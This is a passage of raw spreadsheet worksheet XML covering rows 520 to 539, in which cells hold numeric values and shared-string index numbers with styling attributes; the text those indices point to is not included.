      <c r="Q520" s="12">
        <v>2.6</v>
      </c>
      <c r="R520" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S520" s="12" t="s">
        <v>4064</v>
      </c>
      <c r="T520" s="12" t="s">
        <v>4062</v>
      </c>
      <c r="U520" s="12" t="s">
        <v>4065</v>
      </c>
      <c r="V520" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W520" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X520" s="12">
        <v>2</v>
      </c>
      <c r="Y520" s="12" t="s">
        <v>4066</v>
      </c>
    </row>
    <row r="521" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A521" s="12">
        <v>2194</v>
      </c>
      <c r="B521" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C521" s="12" t="s">
        <v>28260</v>
      </c>
      <c r="D521" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E521" s="18" t="s">
        <v>31428</v>
      </c>
      <c r="F521" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G521" s="12" t="s">
        <v>4067</v>
      </c>
      <c r="H521" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I521" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J521" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K521" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L521" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M521" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N521" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O521" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P521" s="12" t="s">
        <v>4068</v>
      </c>
      <c r="Q521" s="12">
        <v>2.6</v>
      </c>
      <c r="R521" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S521" s="12" t="s">
        <v>4069</v>
      </c>
      <c r="T521" s="12" t="s">
        <v>3277</v>
      </c>
      <c r="U521" s="12" t="s">
        <v>4070</v>
      </c>
      <c r="V521" s="12" t="s">
        <v>4071</v>
      </c>
      <c r="W521" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X521" s="12">
        <v>17</v>
      </c>
      <c r="Y521" s="12" t="s">
        <v>4072</v>
      </c>
    </row>
    <row r="522" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A522" s="12">
        <v>2200</v>
      </c>
      <c r="B522" s="12" t="s">
        <v>28779</v>
      </c>
      <c r="C522" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D522" s="12" t="s">
        <v>28780</v>
      </c>
      <c r="E522" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F522" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G522" s="12" t="s">
        <v>4073</v>
      </c>
      <c r="H522" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I522" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J522" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K522" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L522" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M522" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N522" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O522" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P522" s="12" t="s">
        <v>3798</v>
      </c>
      <c r="Q522" s="12">
        <v>2.6</v>
      </c>
      <c r="R522" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S522" s="12" t="s">
        <v>4074</v>
      </c>
      <c r="T522" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="U522" s="12" t="s">
        <v>3045</v>
      </c>
      <c r="V522" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W522" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X522" s="12">
        <v>3</v>
      </c>
      <c r="Y522" s="12" t="s">
        <v>4075</v>
      </c>
    </row>
    <row r="523" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A523" s="12">
        <v>2202</v>
      </c>
      <c r="B523" s="12" t="s">
        <v>28777</v>
      </c>
      <c r="C523" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D523" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F523" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G523" s="12" t="s">
        <v>4076</v>
      </c>
      <c r="H523" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I523" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J523" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K523" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L523" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M523" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N523" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O523" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P523" s="12" t="s">
        <v>3798</v>
      </c>
      <c r="Q523" s="12">
        <v>2.6</v>
      </c>
      <c r="R523" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S523" s="12" t="s">
        <v>4077</v>
      </c>
      <c r="T523" s="12" t="s">
        <v>4078</v>
      </c>
      <c r="U523" s="12" t="s">
        <v>4079</v>
      </c>
      <c r="V523" s="12" t="s">
        <v>1472</v>
      </c>
      <c r="W523" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X523" s="12">
        <v>5</v>
      </c>
      <c r="Y523" s="12" t="s">
        <v>4080</v>
      </c>
    </row>
    <row r="524" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A524" s="12">
        <v>2204</v>
      </c>
      <c r="B524" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C524" s="12" t="s">
        <v>28781</v>
      </c>
      <c r="D524" s="12" t="s">
        <v>28782</v>
      </c>
      <c r="F524" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G524" s="12" t="s">
        <v>4081</v>
      </c>
      <c r="H524" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I524" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J524" s="12" t="s">
        <v>760</v>
      </c>
      <c r="K524" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L524" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M524" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N524" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O524" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P524" s="12" t="s">
        <v>3994</v>
      </c>
      <c r="Q524" s="12">
        <v>2.6</v>
      </c>
      <c r="R524" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S524" s="12" t="s">
        <v>4082</v>
      </c>
      <c r="T524" s="12" t="s">
        <v>2292</v>
      </c>
      <c r="U524" s="12" t="s">
        <v>4083</v>
      </c>
      <c r="V524" s="12" t="s">
        <v>4084</v>
      </c>
      <c r="W524" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X524" s="12">
        <v>2</v>
      </c>
      <c r="Y524" s="12" t="s">
        <v>4085</v>
      </c>
    </row>
    <row r="525" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A525" s="12">
        <v>2207</v>
      </c>
      <c r="B525" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D525" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F525" s="12" t="s">
        <v>29757</v>
      </c>
      <c r="G525" s="12" t="s">
        <v>4086</v>
      </c>
      <c r="H525" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I525" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J525" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K525" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L525" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M525" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N525" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O525" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P525" s="12" t="s">
        <v>3994</v>
      </c>
      <c r="Q525" s="12">
        <v>2.6</v>
      </c>
      <c r="R525" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S525" s="12" t="s">
        <v>4087</v>
      </c>
      <c r="T525" s="12" t="s">
        <v>2832</v>
      </c>
      <c r="U525" s="12" t="s">
        <v>4088</v>
      </c>
      <c r="V525" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W525" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X525" s="12">
        <v>2</v>
      </c>
      <c r="Y525" s="12" t="s">
        <v>1430</v>
      </c>
    </row>
    <row r="526" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A526" s="12">
        <v>2209</v>
      </c>
      <c r="B526" s="12" t="s">
        <v>28783</v>
      </c>
      <c r="C526" s="12" t="s">
        <v>28784</v>
      </c>
      <c r="D526" s="12" t="s">
        <v>28770</v>
      </c>
      <c r="F526" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G526" s="12" t="s">
        <v>4089</v>
      </c>
      <c r="H526" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I526" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J526" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K526" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L526" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M526" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N526" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O526" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P526" s="12" t="s">
        <v>3994</v>
      </c>
      <c r="Q526" s="12">
        <v>2.6</v>
      </c>
      <c r="R526" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S526" s="12" t="s">
        <v>4090</v>
      </c>
      <c r="T526" s="12" t="s">
        <v>4091</v>
      </c>
      <c r="U526" s="12" t="s">
        <v>4092</v>
      </c>
      <c r="V526" s="12" t="s">
        <v>2034</v>
      </c>
      <c r="W526" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X526" s="12">
        <v>3</v>
      </c>
      <c r="Y526" s="12" t="s">
        <v>4093</v>
      </c>
    </row>
    <row r="527" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A527" s="12">
        <v>2216</v>
      </c>
      <c r="B527" s="12" t="s">
        <v>28785</v>
      </c>
      <c r="C527" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D527" s="12" t="s">
        <v>28786</v>
      </c>
      <c r="F527" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G527" s="12" t="s">
        <v>4099</v>
      </c>
      <c r="H527" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I527" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J527" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K527" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L527" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M527" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N527" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O527" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P527" s="12" t="s">
        <v>4100</v>
      </c>
      <c r="Q527" s="12">
        <v>2.6</v>
      </c>
      <c r="R527" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S527" s="12" t="s">
        <v>4101</v>
      </c>
      <c r="T527" s="12" t="s">
        <v>3915</v>
      </c>
      <c r="U527" s="12" t="s">
        <v>4102</v>
      </c>
      <c r="V527" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W527" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X527" s="12">
        <v>10</v>
      </c>
      <c r="Y527" s="12" t="s">
        <v>4103</v>
      </c>
    </row>
    <row r="528" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A528" s="12">
        <v>2221</v>
      </c>
      <c r="B528" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D528" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E528" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F528" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G528" s="12" t="s">
        <v>4105</v>
      </c>
      <c r="H528" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I528" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J528" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K528" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L528" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M528" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N528" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O528" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P528" s="12" t="s">
        <v>4106</v>
      </c>
      <c r="Q528" s="12">
        <v>2.6</v>
      </c>
      <c r="R528" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S528" s="12" t="s">
        <v>4107</v>
      </c>
      <c r="T528" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="U528" s="12" t="s">
        <v>4108</v>
      </c>
      <c r="V528" s="12" t="s">
        <v>2089</v>
      </c>
      <c r="W528" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X528" s="12">
        <v>10</v>
      </c>
      <c r="Y528" s="12" t="s">
        <v>4109</v>
      </c>
    </row>
    <row r="529" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A529" s="12">
        <v>2228</v>
      </c>
      <c r="B529" s="12" t="s">
        <v>28777</v>
      </c>
      <c r="C529" s="12" t="s">
        <v>28787</v>
      </c>
      <c r="D529" s="12" t="s">
        <v>28786</v>
      </c>
      <c r="F529" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G529" s="12" t="s">
        <v>4110</v>
      </c>
      <c r="H529" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I529" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J529" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K529" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L529" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M529" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N529" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O529" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P529" s="12" t="s">
        <v>4111</v>
      </c>
      <c r="Q529" s="12">
        <v>2.6</v>
      </c>
      <c r="R529" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S529" s="12" t="s">
        <v>4112</v>
      </c>
      <c r="T529" s="12" t="s">
        <v>2645</v>
      </c>
      <c r="U529" s="12" t="s">
        <v>4113</v>
      </c>
      <c r="V529" s="12" t="s">
        <v>197</v>
      </c>
      <c r="W529" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X529" s="12">
        <v>0</v>
      </c>
      <c r="Y529" s="12" t="s">
        <v>4114</v>
      </c>
    </row>
    <row r="530" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A530" s="12">
        <v>2236</v>
      </c>
      <c r="B530" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D530" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E530" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F530" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G530" s="12" t="s">
        <v>4120</v>
      </c>
      <c r="H530" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I530" s="12" t="s">
        <v>525</v>
      </c>
      <c r="J530" s="12" t="s">
        <v>4121</v>
      </c>
      <c r="K530" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L530" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M530" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N530" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O530" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P530" s="12" t="s">
        <v>4122</v>
      </c>
      <c r="Q530" s="12">
        <v>2.6</v>
      </c>
      <c r="R530" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S530" s="12" t="s">
        <v>4123</v>
      </c>
      <c r="T530" s="12" t="s">
        <v>4124</v>
      </c>
      <c r="U530" s="12" t="s">
        <v>4125</v>
      </c>
      <c r="V530" s="12" t="s">
        <v>39</v>
      </c>
      <c r="W530" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X530" s="12">
        <v>8</v>
      </c>
      <c r="Y530" s="12" t="s">
        <v>4126</v>
      </c>
    </row>
    <row r="531" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A531" s="12">
        <v>2238</v>
      </c>
      <c r="B531" s="12" t="s">
        <v>28788</v>
      </c>
      <c r="D531" s="12" t="s">
        <v>28770</v>
      </c>
      <c r="F531" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G531" s="12" t="s">
        <v>4127</v>
      </c>
      <c r="H531" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I531" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J531" s="12" t="s">
        <v>760</v>
      </c>
      <c r="K531" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L531" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M531" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N531" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O531" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P531" s="12" t="s">
        <v>4128</v>
      </c>
      <c r="Q531" s="12">
        <v>2.6</v>
      </c>
      <c r="R531" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S531" s="12" t="s">
        <v>4129</v>
      </c>
      <c r="T531" s="12" t="s">
        <v>112</v>
      </c>
      <c r="U531" s="12" t="s">
        <v>4130</v>
      </c>
      <c r="V531" s="12" t="s">
        <v>299</v>
      </c>
      <c r="W531" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X531" s="12">
        <v>2</v>
      </c>
      <c r="Y531" s="12" t="s">
        <v>4131</v>
      </c>
    </row>
    <row r="532" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A532" s="12">
        <v>2239</v>
      </c>
      <c r="B532" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C532" s="12" t="s">
        <v>28789</v>
      </c>
      <c r="D532" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F532" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G532" s="12" t="s">
        <v>4132</v>
      </c>
      <c r="H532" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I532" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J532" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K532" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L532" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M532" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N532" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O532" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P532" s="12" t="s">
        <v>3994</v>
      </c>
      <c r="Q532" s="12">
        <v>2.6</v>
      </c>
      <c r="R532" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S532" s="12" t="s">
        <v>4133</v>
      </c>
      <c r="T532" s="12" t="s">
        <v>4134</v>
      </c>
      <c r="U532" s="12" t="s">
        <v>4135</v>
      </c>
      <c r="V532" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W532" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X532" s="12">
        <v>4</v>
      </c>
      <c r="Y532" s="12" t="s">
        <v>4136</v>
      </c>
    </row>
    <row r="533" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A533" s="12">
        <v>2241</v>
      </c>
      <c r="B533" s="12" t="s">
        <v>28779</v>
      </c>
      <c r="C533" s="12" t="s">
        <v>28790</v>
      </c>
      <c r="D533" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F533" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G533" s="12" t="s">
        <v>4142</v>
      </c>
      <c r="H533" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I533" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J533" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K533" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L533" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M533" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N533" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O533" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P533" s="12" t="s">
        <v>4143</v>
      </c>
      <c r="Q533" s="12">
        <v>2.4</v>
      </c>
      <c r="R533" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S533" s="12" t="s">
        <v>4144</v>
      </c>
      <c r="T533" s="12" t="s">
        <v>4145</v>
      </c>
      <c r="U533" s="12" t="s">
        <v>4146</v>
      </c>
      <c r="V533" s="12" t="s">
        <v>3527</v>
      </c>
      <c r="W533" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X533" s="12">
        <v>5</v>
      </c>
      <c r="Y533" s="12" t="s">
        <v>4147</v>
      </c>
    </row>
    <row r="534" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A534" s="12">
        <v>2243</v>
      </c>
      <c r="B534" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C534" s="12" t="s">
        <v>28466</v>
      </c>
      <c r="D534" s="18" t="s">
        <v>28349</v>
      </c>
      <c r="E534" s="18" t="s">
        <v>31426</v>
      </c>
      <c r="F534" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G534" s="12" t="s">
        <v>4148</v>
      </c>
      <c r="H534" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I534" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J534" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K534" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L534" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M534" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N534" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O534" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P534" s="12" t="s">
        <v>4111</v>
      </c>
      <c r="Q534" s="12">
        <v>2.6</v>
      </c>
      <c r="R534" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S534" s="12" t="s">
        <v>4149</v>
      </c>
      <c r="T534" s="12" t="s">
        <v>1790</v>
      </c>
      <c r="U534" s="12" t="s">
        <v>4150</v>
      </c>
      <c r="V534" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W534" s="12">
        <v>2528</v>
      </c>
      <c r="X534" s="12">
        <v>100</v>
      </c>
      <c r="Y534" s="12" t="s">
        <v>4151</v>
      </c>
    </row>
    <row r="535" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A535" s="12">
        <v>2266</v>
      </c>
      <c r="B535" s="12" t="s">
        <v>28783</v>
      </c>
      <c r="C535" s="12" t="s">
        <v>28791</v>
      </c>
      <c r="D535" s="12" t="s">
        <v>28792</v>
      </c>
      <c r="F535" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G535" s="12" t="s">
        <v>4153</v>
      </c>
      <c r="H535" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I535" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J535" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K535" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L535" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M535" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N535" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O535" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P535" s="12" t="s">
        <v>4154</v>
      </c>
      <c r="Q535" s="12">
        <v>2.6</v>
      </c>
      <c r="R535" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S535" s="12" t="s">
        <v>4155</v>
      </c>
      <c r="T535" s="12" t="s">
        <v>4156</v>
      </c>
      <c r="U535" s="12" t="s">
        <v>4157</v>
      </c>
      <c r="V535" s="12" t="s">
        <v>197</v>
      </c>
      <c r="W535" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X535" s="12">
        <v>4</v>
      </c>
      <c r="Y535" s="12" t="s">
        <v>4158</v>
      </c>
    </row>
    <row r="536" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A536" s="12">
        <v>2270</v>
      </c>
      <c r="B536" s="12" t="s">
        <v>28793</v>
      </c>
      <c r="D536" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F536" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G536" s="12" t="s">
        <v>4160</v>
      </c>
      <c r="H536" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I536" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J536" s="12" t="s">
        <v>162</v>
      </c>
      <c r="K536" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L536" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M536" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N536" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O536" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P536" s="12" t="s">
        <v>3994</v>
      </c>
      <c r="Q536" s="12">
        <v>2.6</v>
      </c>
      <c r="R536" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S536" s="12" t="s">
        <v>4161</v>
      </c>
      <c r="T536" s="12" t="s">
        <v>4162</v>
      </c>
      <c r="U536" s="12" t="s">
        <v>4163</v>
      </c>
      <c r="V536" s="12" t="s">
        <v>3737</v>
      </c>
      <c r="W536" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X536" s="12">
        <v>2</v>
      </c>
      <c r="Y536" s="12" t="s">
        <v>4164</v>
      </c>
    </row>
    <row r="537" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A537" s="12">
        <v>2271</v>
      </c>
      <c r="B537" s="12" t="s">
        <v>28779</v>
      </c>
      <c r="C537" s="12" t="s">
        <v>28794</v>
      </c>
      <c r="D537" s="12" t="s">
        <v>28795</v>
      </c>
      <c r="E537" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F537" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G537" s="12" t="s">
        <v>4165</v>
      </c>
      <c r="H537" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I537" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J537" s="12" t="s">
        <v>14</v>
      </c>
      <c r="K537" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L537" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M537" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N537" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O537" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P537" s="12" t="s">
        <v>3994</v>
      </c>
      <c r="Q537" s="12">
        <v>2.6</v>
      </c>
      <c r="R537" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S537" s="12" t="s">
        <v>4166</v>
      </c>
      <c r="T537" s="12" t="s">
        <v>4091</v>
      </c>
      <c r="U537" s="12" t="s">
        <v>4167</v>
      </c>
      <c r="V537" s="12" t="s">
        <v>1472</v>
      </c>
      <c r="W537" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X537" s="12">
        <v>4</v>
      </c>
      <c r="Y537" s="12" t="s">
        <v>4168</v>
      </c>
    </row>
    <row r="538" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A538" s="12">
        <v>2276</v>
      </c>
      <c r="B538" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D538" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F538" s="12" t="s">
        <v>29759</v>
      </c>
      <c r="G538" s="12" t="s">
        <v>4169</v>
      </c>
      <c r="H538" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I538" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J538" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K538" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L538" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M538" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N538" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O538" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P538" s="12" t="s">
        <v>3994</v>
      </c>
      <c r="Q538" s="12">
        <v>2.6</v>
      </c>
      <c r="R538" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S538" s="12" t="s">
        <v>4170</v>
      </c>
      <c r="T538" s="12" t="s">
        <v>3473</v>
      </c>
      <c r="U538" s="12" t="s">
        <v>4135</v>
      </c>
      <c r="V538" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W538" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X538" s="12">
        <v>2</v>
      </c>
      <c r="Y538" s="12" t="s">
        <v>4171</v>
      </c>
    </row>
    <row r="539" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A539" s="12">
        <v>2291</v>
      </c>
      <c r="B539" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D539" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F539" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G539" s="12" t="s">
        <v>4193</v>
      </c>
      <c r="H539" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I539" s="12" t="s">
        <v>28</v>
      </c>
      <c r="J539" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K539" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L539" s="12" t="s">
        <v>33</v>
      </c>
